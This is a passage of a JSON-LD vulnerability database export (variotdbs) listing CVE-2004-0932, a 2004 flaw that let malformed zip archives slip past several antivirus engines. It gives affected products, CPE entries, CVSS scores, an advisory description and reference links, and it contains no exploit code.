"id": "CNNVD-200501-310"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9364"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anti-virus software may not properly scan malformed zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
],
"trust": 0.6
}
}
VAR-200501-0297
Vulnerability from variot - Updated: 2023-12-18 12:40McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. A remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. McAfee Anti-Virus is an antivirus software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0297",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.4.1.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.3"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.4.5"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.5"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.0"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.0"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.3"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:archive_zip:archive_zip:1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0932",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9362",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0932",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-286",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9362",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. \nA remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. McAfee Anti-Virus is an antivirus software",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9362"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9362",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "NVD",
"id": "CVE-2004-0932",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "35055",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9362",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"id": "VAR-200501-0297",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:28.954000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "McAfee AntiVirus zip Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146864"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
